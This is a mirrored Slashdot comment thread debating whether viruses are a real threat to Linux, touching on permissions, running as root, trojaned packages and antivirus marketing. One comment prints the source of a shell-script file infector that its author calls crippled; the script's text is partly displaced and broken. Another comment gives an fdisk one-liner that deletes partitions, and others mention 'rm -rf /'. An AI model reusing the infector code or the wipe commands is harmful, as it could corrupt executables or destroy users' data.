Slashdot Mirror
Linux Virii On Their Way?
Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Viruses/trojans are much less of a problim in *nix simply because most running should be done from unpriviliged users accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.
-- Robert
Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.
The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.
Even though there are ways that a Linux system can be compromised, it is usually through the root user installing malicious code himself. Aside from that, there is no other way a Linux user can infect his whole system by compiling an unknown program.
Maybe these russians just thought they could shake up the media a bit if they did that... and
get a fair share of the market, in case a "Antivirus for Linux" ever exists...
Besides being the name of a great Tori Amos single, this virus was discovered way back in 1997 and sparked a large amount of discussion amongst the virii community as to the feasibility and likelyhood of linux virii. Also, several Bliss-like virii later appeared, prompting most major anti-virus companies to release *nix versions of their AV toolkits.
My question is, why is slashdot reporting news that has been known for over 2 years?
"and no, im not the spot working for Transmeta, although i wish i was..." -- ~spot "i'm the epitome of public enemy..."
Of course, this all comes down to system configuration. If the system is properly configured, then viruses would be no problem. But who has the time, or the patience? The average user does not. And it is the average user who falls victim to viruses.
Kaspersky says that experts at his company's laboratories have successfully completed one such prototype: the result is a fully functional and potentially virile Linux virus. Kaspersky assures ZDNet that the virus is under lock and key and will stay that way.
:-)
I suppose he also has a list in his pocket of 205 communists^H^H^H^H^H^H^H^H^H^H viruses in the Linux department
* And remember, it's spelled N-e-t-s-c-a-p-e, but it's pronounced "Mozilla."
I recently had some of my linux files infected by
what was called a 'proto' virus. Though the virus
only infected the file of that particular user, it
was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected. Because then the sysop has to trace down who else on the system executed files of that user. And trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were avaliale for the whole system.
I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle managment and not the technical ranks, I think the technical rank and file who are Linux or Unix literate would just dismiss Kasperskys' claims.
Never knock on Death's door:
More race stuff in one place,
than any one place on the net.
What if you boot a disk with a virus that infects LILO. Can any process (if it can even ba called that at LILO time) survive the Linux boot process intact? What if the virus has enough smarts to find the root filesystem (specified in lilo) and wedge itself into /etc/inittab or some such?
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Well, there you are wrong. There exist real viruses for Linux. They are not trojans and some of them even look for security holes in other computer so that they can break into them. Some links to the most "famous" ones:
Bliss
Staog
--
It has to work - rfc1925
Didn't you See the c compiler that built a trojan verson of login, and had the sense to compile it's trojan version of login into all c compilers it compiled even thoguh the source didn't have it? Was a /. artical not too long ago.
Remember Melissa? It didn't do anything other than make a private note that it had visited and send emails. Think that Unix permissions help against something like this?
Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.
Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?
No, Linux is not immune to viruses. And as long as buffer overflows and the like continued to be treated as minor oversights and not like the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...
Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?
Regards,
Ben
PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
That being said, I also used to hang out on Fido Net's virus echos in 1994 and 1995 where some of the true anti-virus experts hung out too. And yes, I consider Eugine Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word Macro virus (Winword.Concept), he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another word macro which caught and disinfected Winword.Concept).
Unfortunately, I fear this is another case of False Authority Syndrome in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)
I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.
Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distrubtion is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.
I run as root all the time. I cut my teeth on DOS, Windows, and then NT, and have always run with Administrative priveleges. Never had a problem, I am just extremely careful with what I do.
Most of the time I use Linux I am tinkering, recompiling, reinstalling new versions etc... things that require root access. So why bother with the fiction of a 'user' account?
Ok, so I might be exposing myself to a slightly greater risk with regards to Linux viruses - guess that's what backups are for.
-josh
I think the real problem related to this is that, none of the distros (at least the ones I've used), requere any user account to be set up besides the root account at installation time - nor is the user suggested by the install program to do that later on. If users where requered to create an initial account for themselevs, and instructed by the installation program not to use the root account for anything except fro maintainse and program installation, more of the newbies would probably run as unprivilegied users most of the time. In addition, such an installer could ask the user if he/she wants to set up some usefull groups for getting "half-god" privilegies, like write ability to /usr/local and mount ability on /dev/cdrom and /dev/floppy. That sort of privilegies would not comprimise system security much, but restrict the occasions on which a user "su -"'s...
--The knowledge that you are an idiot, is what distinguishes you from one.
--The knowledge that you are an idiot, is what distinguishes you from one.
According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems.
The "security expert" has a point, but does not seem to be seeing the whole picture. Open source might make it easier for malicious virus-writers to exploit Linux... but it also makes it easier for the rest of us to see what devious tricks they're up to and protect ourselves. I'm going to be generous and suggest that there are more of us than there are of them. There are probably better minds working on the "good-guy" team too.
I don't see how this would make Linux viruses "worse", though theoretically they could be more prevalent. In that unusual scenario, it might be advisable for the uninformed newbies to stick with closed-source OS'es (like they don't already?), since they don't yet know how to protect themselves.
Windows et at might then rightfully be seen as "training wheels" OS'es, for people to use until they learn what they're doing and are ready to graduate to open source.
As most viruses in the real world are NOT written to exploit open-source OS'es, even that argument doesn't apply in reality. If it's not a good entry-level OS (for security reasons), what IS Windows good for?
But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.
Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.
--- Hot Shot City is particularly good.
- a) less than saavy users. download some untrustworthy source or kernel source or even some binaries and voila, point of infection.
- b) distro poisoning, easier said than done (remember tcp_wrappers got infected, too)
- c) worm style incidents using poorly known holes in major distros (ie Linuxconf vulnerabilities, Apache holes, etc..).
it's a lot easier than some of you may think. a scenario for you: mirror mirror.example.com gets rooted and trojans of key RPM's of the latest RedHat distro are plced in. MD5 sums are altered and the whole thing loks legit. once installed, the packages (gcc, a kernel module, and a few access trojans like telentd or sshd) lie in wait. the kernel module keeps the user from seeing the problem, gcc's trojan always keeps trojans in the system, and the listening entry points are there and well hidden. bingo, you have a problem. say, in a TFN or Trin00 manner you manipulate the systems to rm -rftrust is a magical thing to abuse. and users' trust is getting greater and greater. how many times has the schlub in the cubicle next to you downloaded some spiffy screensaver from the net or run some "executable" from their email? all too often... :)
bear in mind that thompson build a cc trojaned to allow him to log in specially on any box using his cc, which also built it's trojan propogating systems in, too. :) thompson's not malicious, but some people are.
think about all the s|
jose nazario jose@biocserver.cwru.edu
Here's a portable unix virus. Originally based on the shell script header produced by "gzexe", it contains the necessary apparatus to infect other executables, but no payload. There are at least two problems with the version enclosed in this message which prevent it from functioning.
/dev/null
/tmp/if$$.XXXXXX` || {
/tmp/gz$$.XXXXXX` || {
/tmp/"$prog" ${1+"$@"}; res=$?
Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.
#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676
seed=1
function srandom () { seed=$[$$+`date +%s`] }
function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }
function choose () {
shift `random $#`
echo $1
}
function infected () {
head -2 $1 | tail -1 | grep $signature >
}
function infect () {
# pathlist=`echo $PATH | tr : " "`
# dir=`choose $pathlist`
dir=$HOME/bin
echo "Will infect in $dir"
names=`find $dir -maxdepth 1 -type f`
name=`choose $names`
echo "will infect $name"
if infected $name; then
echo Already infected
else
if [ ! -w $name ]; then
notwrite=1
chmod u+w $name
fi
if [ -w $name ]; then
infectfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
(head -$[$skip-1] $0; cat $name) > $infectfile
cat $infectfile > $name
rm -f $infectfile
if [ x$notwrite = x1 ]; then
chmod u-w $name
fi
echo success
else
echo Darn, no write permissions
fi
fi
}
srandom
tmpfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
if tail +$skip $0 > $tmpfile; then
infect
chmod 700 $tmpfile
prog="`echo $0 | sed 's|^.*/||'`"
if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
(sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
else
trap 'rm -f $tmpfile; exit $res' 0
(sleep 5; rm -f $tmpfile) 2>/dev/null &
$tmpfile ${1+"$@"}; res=$?
fi
else
echo Cannot decompress $0; exit 1
fi; exit $res
true
Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.
It spreads from user to user, and once you're infected, you can never go back.
It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
I do what the voices on my console tell me to do.
OK, I think most of us can agree with this:
:-)
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.
So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh?
And you may ask yourself, well, how did I get here?
No, it means that we will all have to go out and buy Kaspersky Lab's Linux antivirus software (http://www.Kasperskylab.ru/eng/p roducts/linux.html)!
How convenient! This reminds me of the story about Novell's CEO a few months back. He claimed that his CC number was stolen on the internet, and what do you know, the best way to keep this from happening just happens to involve Novell software.
Ian "zsazsa" Scott
A trojan is a delivery mechanism, a virus is a self replicating program.
A virus might attach itself to a benign program, thus transforming that program into an unwitting trojan, or a trojan might deliver a non-self-replicating program - even a virus killer.
Of course either of the two can exist on Linux, but Linux (and all Unices) have security mechanisms to minimise the damage done by, and propagation of, these beasties.
if this fella offered to show the locked up completed Linux virus to one of the major kernel hackers - maybe Alan or Linus - so we all could get a knowledgeable assessment of the possible current and future dangers. Just a thought
"shop smart:shop s-mart" ash
- There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
- Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them. but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
- Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with a email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.
So, what it comes down to is that, in general, Unix viruses are not (and will not) be a problem, but that Linux has vunerabilities that make it less secure than Unix used to be.--
-=DaveHowe=-
Yep, I'm happy if they come. Why you ask?
Answer:
After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of the sudden will be. And people will start thinking before make && make install
It can't kill us, and what doesn't kill us only makes us stronger.
Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.
This sig is false.
I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net)
Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.
Well over fifty posts, and no one has called him on such a blatant mispelling.
Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices.
What, you don't think that's a real word either? Damn language nazis...
There is no, I repeat no stackguarding technique to completely prevent buffer overflows. Take a look at last week's Kernel Traffic for a summary of a good discussion about this.
Automated library-level checking, whether using a stackguarded compiler or weird stack hacks in the OS is no way to make an app buffer-overflow secure. The only way to do it is continuous human code auditing (and careful initial coding practices), à la OpenBSD. OpenBSD is tight, carefully audited, and in fact provides surprisingly little as far as applications. The size of a typical Linux install is a huge enemy of auditing -- there's just too much stuff to go through. You can however build quite a secure system (assuming you don't have any untrusted local users) simply by strictly limiting which services your machine offers to the outside.
The Internet Worm won't happen again in the UNIX world -- we learned our lesson at the time about poorly written programs and known problems. M$, typically, still hasn't figured this one out. The only reason UNIX users won't be vulnerable to Word Macro-type viruses is that no UNIX user would use such a pathitically stupid application -- and a UNIX user would know better than to execute a random chunk of code he found lying around.
Of course the user can still screw himself if he's dumb, but that's not fundamentally against the UNIX mentality -- 'rm -Rf *' has always been there waiting for you.
...
Actually, a real problem is the fact that most users go looking all over the internet for RPMs of their latest gotta-have applications, without checking the origins. Downloading RPMs from random webpages and installing them as root could be a very bad idea.
Sure, Linux viruses might be worse because Linux is Open Source Software, all other things being equal. If you have the source, it is easier to find holes and create exploits for them.
The thing is, all other things are not equal.
The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user.
Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error.
What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about then MS-Windows users.
dragonhawk@iname.microsoft.com
I do not like Microsoft. Remove them from my email address.
It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?
Although it is true that Linux (and Unices in general) tend to give less motivations for virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork( ) bombs? Or HD space hoggers that cause you to be unable save your latest document? The system may be less vulnerable, but your data isn't.
mikre he sophia he tou Mikrosophou.
Well, no, it was never that way.
You are probably thinking of second declension masculine masculine Latin nounds (there are lots of them). The nominative singular ending for these nouns is -us. The nominative plural is -i (note just one i, not two (or i not ii in Roman numerals)).
There are other declensions that use -us in the nominative singular and something different in the plural. For example, third declension nouns of any gender may end in -us in the nominative singular, while the nominative plural ending for masculine nouns is -es.
I realize that I may be one of the only Slashdot geeks to have majored in Classical Languages instead of Computer Science, and no pedantry was intended in this post.
Some things that are going to make Linux easier to attack:
One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.
The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.
The net will not be what we demand, but what we make it. Build it well.
Microsoft will blame it on the poor security model in Linux.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.
A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.
Virusses would also have to fear programs like tripwire which take checksums of vital executables. This is another good reason to use tripwire and related products. While it is possible to defeat tripwire it would involve more code than a virus is likely to want to carry in its payload.
Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.
Unless you code your virus in a macro language, the cross platform nature of Linux will also bog down the prospective virus writer. Since the archetectures are very different and virusses usually do very low level stuff, he'd have to port the machine dependent code to the various Linux platforms. On the plus side he could use cvs and bugzilla so that his users could report bugs with his virus.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
If the guys who coded the daemon didn't do a good job, a virus writer might be able to swing a buffer overflow with a properly coded get request. I don't know off the top of my head exactly what effect overflowing a buffer would have in the kernel though.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
You could also not allow users, which is a much more sensible solution for 90% of the Linux using population. Most users don't have the know-how to lock their system down well enough to prevent a user from exploiting a buffer overflow. The general rule of thumb is if you don't trust a user with root, don't let him on your system.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.
Suggestions:
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.
And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.
And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
It doesn't need to infect or modify the kernel at all. All it needs to do is copy itself into the filesystem somewhere and insert a line into /etc/inittab.
/etc/rc.d/rc.* structure is only accessable as root to begin with. My firewalls boot from write-protected floppy. I've yet to see a virus reach out of the CD-ROM, pop the disk out, flip the tab and put it back in.
I don't know about your servers, but my
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
The upshot is that users in the know back up their critical data on a regular basis. If you can't be bothered to do that, don't expect any sympathy from anyone.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
You've got nice friends... :) But why do you give them root login anyway? Do they really need it to do other things than just
/dev/[hs]da ???
echo -e 'd\n1\nd\n2\nd\n3\nd\n4\n' | fdisk
I think it's a good habit to be the only one who knows the root password.
Tripwire takes checksums of all your important files, a major feature in many antivirus programs. Write your checksums to a zip disk, set the read only tab and check them every few days.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Most modern unices have some form of configurable resource limits. Things like number of processes, amount of memory, CPU usage, etc. can usually be limited per user, making "attacks" of this nature worthless.
Disk quotas can prevent users from filling up filesystems, also.
i was more or less under the impression that "virile" (from latin "vir" meaning "man," i believe--akin to "puerile" from "puer" = "boy") referred to the sexual capability of a male, and that the correct word to describe a particularily nasty virus was "virulent." anyone want to correct me?
No agrument here, a natural virus would be virulent. But its kinda funny to think about a "virile" computer virus. I think it would be one that automatically redirected your web browser to porn sites and guns.com :-)
Or maybe popped up messages like "is my CD drive open or am I just happy to see you?" and "Are you implying I could ever have a soft drive?"
...will work for Chick tracts...
No, thats what Cron is for :) manually backing up.. are you serious???
"Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls"
/bin/ls or explorer.exe to the kernel modules or kernel32.dll, and short of booting from a known clean floppy and reinstalling there's no way to be certain that a running virus isn't hiding itself from virus checkers (which isn't hard), maliciously attacking personal files repeatedly.
Not quite true. If a virus deletes my entire home directory, and I'm smart, I just whip out the latest backup CD-R and do the restore as root. Voila, no more virus.
On the other hand, if a virus infects my system running as root or infects my Windows system, there is nothing short of a reinstall I could do to make sure my system is secure. That virus might have infected anything on the system, from
And frankly, I have to reinstall Windows often enough when it's virus-free. I haven't reinstalled Linux in years, and I'd like to keep it that way.
Well, look at the Linux/Stoag computer virus. It does exactly what we're worrying about in exploit bugs.
Linux as an operating system is, in actuality, a lot more insecure than we'd like to admit. To prove my point, look at RedHat's Linux 6.1 Security Advisories page. How many of these packages were fixed to prevent root exploits? Five of thirteen. But look at how common some of these five are!
Malicious people can use lpr of all things! Another famous example: bind. Or how about wu_ftpd? Those two, alone, are present alone on how much of the linux community?
Honestly, were it not for freshmeat.net , I probably would not have discovered the existance of the new packages. (I don't check RedHat's site often. And I don't signup for mailing lists either... So this is my fault.)
There are script kiddies out there who can manipulate the overflows in bind. (Please, for the love of God, if you haven't updated to bind 8.2.2_P3, go do so!) If a script kiddie can find a way to do that, then some coder worth his paycheck can probably figure out a way to have a program manipulate itself into root that way.
I mean, all some perverse (or highly bored) programmer has to do is write a program to manipulate those bugs to get root... And then run rm -rf / to kill your machine. (There are, of course, nastier things one could do, but the less ideas I generate for others, the better.)
By no means, are we safe. Linux virii will eventually be created and released into the wild. (There are even some that claim that MicroSoft will be the origin for the epidemic.)
The only way we can keep ourselves truly safe is to catch security holes before the other side does and update our source packages before the attacks start.
There is a saying in network security: "One loose link is all you need."
--CAE
--
--
E2 IN2 IE?
However, most newbies don't run any binaries (or even scripts) that they have write access to! How is a file infector going to work if all their executables are owned by root and they don't have write access?
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
Of course, the obvious response is to run MS Office as root... in a chroot jail! It will be worth the hassles to have the obvious desktop icon.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
My understanding is that their Lisp implementation has enough security built in to avoid the problem...
:-)
Cheers,
Ben
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
FYI, GNU Parted is a great program, and (of course) it's GPL'd. It serves the same basic functionality as PartitionMagic 4.0, and if you were to make a boot floppy with it on there, you'd have no troubles at all. (Me, i blew out my floppy drive so i DO have troubles, but that's besides the point.) Hey, I suppose I could install a minimalistic linux distro with almost nothing (except parted) on a partition, as well as on my slackware, and that'd be all i needed... plan taken! (Any better plans, e-mail em to me...)
--
linuxisgood:~$ man woman
Restating the obvious since nineteen aught five.
Indeed.
It is also important to consider the security advantage of a separate /var partition, Since this is where logs go. Allowing an attacker to fill your root partition with log info would likely be very bad.
"I have a good idea why it's hard to verify programs. They're usually wrong." --Manuel Blum, FOCS 94
Linux, where you get more Geek Chic for finding the bug than exploiting it.
Viruses are on the way, and will most likely be even more attractive for Linux than WinXX. By writing a WinXX virus, I have to fool a virus checker, and even then I can generally only affect the clients of an organization. And if you have the "." in your path?? You're a great target. Plus, I can just start taking out your linux machines, your print servers, your databases, have a trojan report back keystrokes and network stats until it blows up?? Doable. And the virus will most likely not be open source.
Plus, what about companies like Norton?? I have this sneaking suspicion that they actually create some of these viruses, both to increase the value of their own product, and to devalue the product of a competitor. (You'd be surprised at the viruses I've seen that only one virus checker can find when they all have updated defs.) I know that this delves into the realm of conspiracy theory, but if theres a Dr. Solomon's for linux, there will have to be a virus for it to find. And if linux gets a good mindshare....
P.S. I wrote quite a bit of Unix virii back in the day, and it ain't that difficult.
Just My 0.02
Jason
No, all you need to do is trick the user in running something as root. For instance, offering him some nice looking software, and infect the system during "make install". You might even wrap it in a PGP signed RPM, with available fingerprints, and do the same trick when the RPM is installed.
-- Abigail
Geez,
You'd think somebody (those other guys) forgot to include humor.h, or somebody urinated in their Cheerios this morning.
I do what the voices on my console tell me to do.
yea i did that today... i know floppies are essential, but i blew them out THAT DAY...
--
linuxisgood:~$ man woman
Restating the obvious since nineteen aught five.